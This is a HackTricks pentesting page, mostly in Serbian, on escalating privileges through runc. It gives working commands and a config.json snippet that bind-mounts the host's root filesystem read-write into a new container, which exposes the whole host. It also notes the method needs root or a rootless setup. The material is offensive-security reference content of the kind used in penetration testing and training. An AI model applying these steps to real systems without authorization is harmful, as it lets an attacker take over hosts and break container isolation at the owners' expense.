RunC Privilege Escalation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Osnovne informacije

Ako želite da saznate više o runc, pogledajte sledeću stranicu:

2375, 2376 Pentesting Docker

PE

Ako otkrijete da je runc instaliran na hostu, možda ćete moći da pokrenete kontejner montirajući root / folder hosta.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Ovo neće uvek raditi jer je podrazumevana operacija runc-a da se pokreće kao root, tako da njegovo pokretanje kao korisnika bez privilegija jednostavno ne može funkcionisati (osim ako nemate konfiguraciju bez root-a). Postavljanje konfiguracije bez root-a kao podrazumevane nije generalno dobra ideja jer postoji prilično mnogo ograničenja unutar kontejnera bez root-a koja se ne primenjuju van kontejnera bez root-a.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousPayloads to execute NextSELinux

Last updated 4 months ago